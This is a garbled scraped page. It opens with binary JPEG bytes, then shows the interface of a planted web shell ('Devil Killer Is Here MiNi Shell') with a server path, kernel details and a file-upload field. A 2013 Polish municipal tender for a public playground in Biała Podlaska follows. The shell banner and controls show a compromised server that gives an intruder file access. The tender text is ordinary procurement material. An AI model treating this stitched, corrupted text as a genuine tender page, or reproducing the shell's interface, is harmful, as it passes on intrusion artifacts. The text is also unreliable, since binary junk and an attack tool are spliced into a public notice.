JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/391278-N-2013.html

<p class="kh_header"><b>Biała Podlaska: Przedmiotem zamówienia jest wykonanie ogólnodostępnego placu zabaw przy obiektach UKS TOP-54 przy ulicy Sidorskiej w Białej Podlaskiej.</b><br>
<b>Numer ogłoszenia: 391278 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Biała Podlaska , ul. Marszałka Józefa Piłsudskiego 3, 21-500 Biała Podlaska, tel. 083 3416177, faks 083 3437064.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialapodlaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie ogólnodostępnego placu zabaw przy obiektach UKS TOP-54 przy ulicy Sidorskiej w Białej Podlaskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę i montaż fabrycznie nowych urządzeń zabawowych (kompletnych). Dostawę i montaż ogrodzenia z dwiema furtkami 
z wykonaniem nawierzchni piaszczystej bezpiecznej.
1.W skład wyposażenia placu zabaw wchodzą następujące elementy:

1)Dostawa i montaż huśtawki wahadłowej podwójnej (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, zawiesia łożyskowe, zawieszenie wykonane z łańcucha dn 6 mm, galwanizowanego w górnej części zakończone -krętlikami, zapobiegającymi skręcaniu się łańcucha, wys. min. 220 cm, szerokość min. 220 cm, długość min. 340 cm, konstrukcja z rur stalowych ocynkowanych, malowana farbami proszkowymi odpornymi na zmienne warunki atmosferyczne, siedziska 2 szt. zabezpieczone gumą z atestem.
2)Dostawa i montaż wieży ze zjeżdżalnią - rozbudowana duża (typu Baszta 4) (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem i kotwami, wys. min. 320 cm, długość min. 570 cm, dwa ślizgi z blachy nierdzewnej i kwasoodpornej, konstrukcja stalowa ocynkowana malowana proszkowo. Wszystkie inne elementy ze stali konstrukcyjnej (drabinki, poręcze, uchwyty, pomosty, barierki zabezpieczone farbami proszkowymi poliestrowymi odpornymi na zmienne warunki atmosferyczne. Zabezpieczenia, ścianki i dach z warstwowych płyt HDPE.
3)Dostawa i montaż karuzeli krzyżowej (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem 
i kotwami, wys. min. 70 cm, szerokość min. 180 cm, długość min. 180 cm, konstrukcja z rur stalowych, średnica min 100 mm, całość ocynkowana i malowana lakierem proszkowym odpornym na zmienne warunki atmosferyczne, siedziska z gumy z oparciem przyspawanym do ramion karuzeli 4 szt. Prędkość karuzeli 5m/s.
4)Dostawa i montaż ściany wspinaczkowej (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem 
i kotwami, wys. min. 150 cm, dł. min 150 cm, konstrukcja z rur stalowych ocynkowanych metodą ogniową, malowana lakierem odpornym na zmienne warunki atmosferyczne oraz z warstwowej płyty odpornej na warunki atmosferyczne, wgniecenia, zarysowania.
5)Dostawa i montaż bujaka typu ŻABA (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem 
i kotwami, wys. min. 65 cm, szerokość min. 40 cm, długość min. 70 cm, konstrukcja 
z płyt HDPE, siedzisko z tworzywa sztucznego, sprężyna średnicy min.150 mm na podstawie stalowe, elementy metalowe ocynkowane oraz malowane lakierem.
6)Dostawa i montaż - bujak - sprężynowiec typu SŁOŃ (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. min. 65 cm, szerokość min. 40 cm, długość min. 70 cm, konstrukcja z płyt HDPE,  siedziska z tworzywa sztucznego, sprężyna średnicy min.150 mm na podstawie stalowej, elementy metalowe ocynkowane oraz malowane lakierem.
7)Dostawa i montaż - sprężynowiec bujak typu KONIK (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. min. 65 cm, szerokość min. 40 cm, długość min. 70 cm, konstrukcja z płyt HDPE, siedziska z tworzywa sztucznego, sprężyna średnicy min.150 mm na podstawie stalowej, elementy metalowe ocynkowane oraz malowane lakierem.
8)Dostawa i montaż - sprężynowiec bujak typu SKUTER (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. min. 65 cm, szerokość min. 30 cm, długość min. 70 cm, konstrukcja z płyt HDPE,  siedziska z tworzywa sztucznego, sprężyna średnicy min.150 mm na podstawie stalowej, elementy metalowe ocynkowane oraz malowane lakierem.
9)Dostawa i montaż - huśtawka wagowa podwójna typu WAŻKA (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem i kotwami, wys. min. 70 cm, konstrukcja z rur stalowych ocynkowanych, malowana lakierem lub drewniane z drewna klejonego impregnowanego z atestem, podpora o średnicy min. 90 mm, siedziska z gumy.
10)Dostawa i montaż karuzeli tarczowej 150 z obrotową górną częścią (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem i kotwami; dwa łożyska stożkowe i jedno kulowe; konstrukcja platformy wykonana ze stalowych ceowników, blachą zapobiegającą zakleszczeniu nogi dzieci. Całość ocynkowana i malowana lakierem. Prędkość karuzeli 5m-s.
11)Dostawa i montaż ścianki wspinaczkowej typu ORBITA (firmy Muller lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. min. 180 cm, elementy metalowe malowane lakierem odpornym na zmienne warunki atmosferyczne, liny z rdzeniem stalowym. 
12)Dostawa i montaż stojaka na rowery 6 -cio stanowiskowy metalowy malowany proszkowo (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych).
13)Dostawa i montaż ławki na stelażu betonowym z oparciem (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz z fundamentem i kotwami, wys. do 80 cm, szerokość do 70 cm, długość 170- 200 cm, szerokość siedziska do 50 cm, wysokość siedziska od ziemi do 50 cm, siedziska i oparcia drewniane z listew grubościi min. 5 cm, impregnowane preparatem na bazie naturalnych olejów i wosków. Ławka trwale posadowiona w gruncie 
14)Dostawa i montaż piaskownicy z drewna liściastego impregnowanego próżniowo - ciśnieniowo, zakotwiona w ziemi (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych). Elementy złączne ocynkowane i osłonięte plastikowymi kołkami 
15)Dostawa i montaż - tablica informacyjna z regulaminem wraz z fundamentem i kotwami. przestrzeń na regulamin min 90 x 40 cm z daszkiem wys min. 200 cm. (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych).
Do tablicy należy dołączyć  regulamin placu zabaw z informacją o zarządcy placu. 
16)Dostawa i montaż urządzenia linowego typu HATI (firmy ASTRUS lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych)wraz 
z fundamentem i kotwami, wys. max. 240 cm, okrąg o promieniu 350 cm, elementy metalowe malowane lakierem odpornym na zmienne warunki atmosferyczne. Liny 
z rdzeniem stalowym.
17)Dostawa i montaż urządzenia linowego typu NIX (firmy ASTRUS lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. max. 300 cm, okrąg o promieniu 400 cm, elementy metalowe malowane lakierem odpornym na zmienne warunki atmosferyczne, liny 
z rdzeniem stalowym.
18)Dostawa i montaż urządzenia linowego typu WEGA (firmy ASTRUS lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, wys. max. 300 cm, okrąg o promieniu min. 300 cm, elementy metalowe malowane lakierem odpornym na zmienne warunki atmosferyczne, liny z rdzeniem stalowym.
19)Dostawa i montaż - przeplotnia typu COMBO (firmy MULLER lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych) wraz 
z fundamentem i kotwami, max. wysokość 210 cm, elementy metalowe malowane lakierem odpornym na zmienne warunki atmosferyczne, liny zbrojone, podest wykonany z tworzywa kompozytowego.
20)Dostawa i montaż betonowego stołu do gry w szachy i chińczyka dla dwóch par wykonany na bazie twardych kruszyw z surowców naturalnych (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych), blat szlifowany, zaimpregnowany specjalistycznym lakierem odpornym na zmienne warunki atmosferyczne, obrzeże ze stopu aluminiowego, konstrukcja podporowa stołu oraz dwie ławeczki stalowo betonowe, siedziska ławeczek drewniane zaimpregnowane środkami 
z atestem higienicznym.
21)Dostawa i montaż betonowego stołu do gry w szachy wykonany na bazie twardych kruszyw z surowców naturalnych (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych), blat szlifowany, zaimpregnowany specjalistycznym lakierem odpornym na zmienne warunki atmosferyczne, obrzeże ze stopu aluminiowego, konstrukcja podporowa stołu oraz cztery ławeczki stalowo betonowe, siedziska ławeczek drewniane zaimpregnowane środkami z atestem higienicznym.
22)Dostawa i montaż ławko - stołu wykonanego z drewna sosnowego, impregnowanego próżniowo - ciśnieniowo przestawnego bez fundamentu (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych). 
23)Dostawa i montaż urządzenia do ćwiczeń typu NARCIARZ (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych), wysokość nad powierzchnią min. 200 cm, szer. min 135 cm, dł. min. 50 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne; podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu. pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20-25).
24)Dostawa i montaż urządzenia do ćwiczeń typu ROWEREK (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych), wysokość nad powierzchnią min. 200 cm, szer. min 110 cm, dł. min. 70 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne; podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu, pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20/25).
25)Dostawa i montaż urządzenia do ćwiczeń typu KOŁA TAI CZI MAŁE (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych). Wysokość nad powierzchnią min. 200 cm, szer. min 60 cm, dł. min. 100 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne. Podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu. pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20-25).
26)Dostawa i montaż urządzenia do ćwiczeń typu PAJACYK (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych); wysokość nad powierzchnią min. 200 cm, szer. min 95 cm, dł. min. 90 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne; podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu. pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20-25). 
27)Dostawa i montaż urządzenia do ćwiczeń typu PODCIĄG NÓG (firmy NOVUM lub innej o równoważnych parametrach technicznych, materiałowych oraz wizualnych); wysokość nad powierzchnią min. 200 cm, szer. min 105 cm, dł. min. 70 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne; podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu. pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20-25). 
28)Dostawa i montaż urządzenia do ćwiczeń typu BIEGACZ (firmy NOVUM lub innej 
o równoważnych parametrach technicznych, materiałowych oraz wizualnych); wysokość nad powierzchnią min. 145 cm, szer. min 65 cm, dł. min. 135 cm; główne elementy ze stali ocynkowanej i malowanej proszkowo farbami odpornymi na zmienne warunki atmosferyczne; podstopnice ze stali nierdzewnej; siedziska i oparcia z płyty HDPE antypoślizgowej odpornej na zmienne warunki atmosferyczne; elementy ruchome ograniczone pochłaniającymi siłę (amortyzujące, wibroizolujące). Urządzenie zamontowane min. 30 cm nad powierzchnią gruntu. Pylon mocowany do betonowego bloku 1000x1000x250 mmm (beton min. C20-25) 
29) Dostawa i montaż kosza na śmieci z półwałków. Słupy nośne o przekroju okrągłym z drewna sosnowego rdzeniowego, toczonego cylindrycznie o śr. 12 cm, impregnowane próżniowo -ciśnieniowo, osadzone 10 cm nad powierzchnią gruntu za pomocą stalowych okuć kotwionych w betonowym fundamencie. Elementy metalowe zabezpieczone antykorozyjnie poprze lakierowanie proszkowe. Wkład z blachy ocynkowanej gr 2 mm .
30)Dostawa i montaż ogrodzenia panelowego placu zabaw, (pręty pionowe min fi  12 mm zakończone owalem - połączone z drugim ) o  wysokości  1,0 m. Dwa profile 
z  60x40x3mm na słupkach:  50x50x1500 wraz z wykopaniem dołów i ich zabetonowaniem - ogrodzenie z elementów ocynkowanych i malowanych proszkowo w kolorze zielonym RAL 6005. Obejmy narożne i liniowe
31)Dostawa i montaż furtek stalowych, profile i pręty jak w ogrodzeniu, wsp do R = 0,5, w komplecie 2 słupki i obejmy, wyposażona w zamek z kluczem, zawiasy, klamkę; bramka wg systemu j.w.
32) Wymagania jakościowe i materiałowe: 

a)Urządzenia zabawowe muszą być fabrycznie nowe, o minimalnych parametrach technicznych określonych wyżej i muszą posiadać deklarację zgodności producenta stwierdzającą, że oferowane wyroby są zgodne z wymaganymi normami PN-EN 1176 lub certyfikaty, atesty, wystawione przez laboratorium, jednostkę certyfikującą lub inny podmiot przeprowadzający ocenę zgodności, akredytowany przez Polskie Centrum Akredytacji, potwierdzające, że oferowane wyroby spełniają wymagania i warunki określone w odpowiednich Polskich Normach.
b)Zabrania się stosowania materiałów nie odpowiadających wymaganiom Polskiej Normy. 
c)Montaż urządzeń zabawowych nastąpi w wyznaczonych miejscach, w uzgodnieniu z Zamawiającym z zachowaniem stref bezpieczeństwa, które muszą być zgodne z normą PN-EN 1176-1. Głębokość i wielkość fundamentów winna być zgodna z normami budowlanymi i winna zapewnić stabilność konstrukcji.
Główne elementy konstrukcyjne urządzeń muszą być mocowane w fundamentach 
z betonu B15-B30. 
d)Zgodnie z ustawą z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (tekst jednolity z 2004r. Dz. U. Nr 204, poz. 2087 z poź. zm), każde urządzenie powinno posiadać oznakowanie potwierdzające zgodność wyrobu z zasadniczymi wymaganiami. Zamawiający wymaga by oferowane urządzenia zabawowe posiadały tabliczki znamionowe. Tabliczka znamionowa urządzenia powinna zawierać m.in. podstawowe informacje o produkcie tj. nazwę producenta, rok produkcji, nr normy PN-EN 1176, zgodnie z którymi urządzenia wyprodukowano. 
33).Oferowane wyroby musza posiadać certyfikat lub deklarację zgodności z normą PN-EN 1176 lub atesty wystawione przez laboratorium, jednostkę certyfikującą lub inny podmiot przeprowadzający ocenę zgodności, akredytowany przez Polskie Centrum Akredytacji, - zdjęć, wizualizacji wraz ze specyfikacją techniczną oferowanych elementów placów zabaw zawierających dane techniczne, wymiary, itp.
34).Opis piaszczystej nawierzchni bezpiecznej - tzw. bezpieczne pole piaskowe pod urządzeniem zabawowym, wymagające przeprowadzenia prac ziemnych obejmujących: 
a)wykorytowanie starego podłoża o wymiarach strefy bezpiecznej indywidualnej dla każdego urządzenia zabawowego na głębokość odpowiadającą grubości piaszczystej nawierzchni bezpiecznej, określonej w normach serii PN-EN 1176 i PN-EN-1177 dla poszczególnych urządzeń zabawowych;
b)zakup nowego piasku określonego w w-w normach, 
c)uzupełnienie obszaru powstałego z w-w korytowania piaskiem o odpowiedniej wielkości ziaren określonej w w-w normach. 

W przypadku, gdzie użyto nazw własnych, znaków towarowych itp. dla opisu przedmiotu zamówienia, zamawiający dopuszcza rozwiązania równoważne tj. o porównywalnych parametrach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu winien wnieść wadium przed upływem terminu składania ofert w wysokości 4 300 ,00 PLN (słownie: cztery tysiące trzysta złotych).
2. Wadium może być wniesione w jednej lub w kilku następujących formach:
2.1.	pieniądzu,
2.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym ze poręczenie kasy jest poręczeniem pieniężnym, 
2.3.	gwarancjach bankowych, 
2.4.	gwarancjach ubezpieczeniowych, 
2.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit.b ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr 42, poz. 275). 
3.	Wadium wnoszone w pieniądzu należy wpłacić na konto Urzędu Miasta Biała Podlaska: Bank Zachodni WBK SA nr rachunku 08 1500 1331 1213 3001 4919 0000  do dnia 08.10.2013 r. do godz. 12:00 
4.	Oferta, która nie będzie zabezpieczona akceptowaną formą wadium zostanie odrzucona.
5.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze 
oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
którego oferta została wybrana jako najkorzystniejsza.
6.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
zwróci wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia 
należytego wykonania umowy.
7. Zamawiający zwróci niezwłoczne wadium na wniosek Wykonawcy, który wycofał
ofertę przed upływem terminu składania ofert.
8.	Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi 
z oprocentowania rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta 
została wybrana:
9.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach  określonych w ofercie,
9.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
9.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.
9.4.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 
trzech lat przed upływem terminu do składania ofert, a jeżeli okres prowadzenia 
działalności jest krótszy w tym okresie, wykonał minimum dwie dostawy (wraz z montażem) urządzeń zabawowych o wartości minimum 100.000,00 zł brutto każda, 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli:
Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na 
wartość co najmniej  100 000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
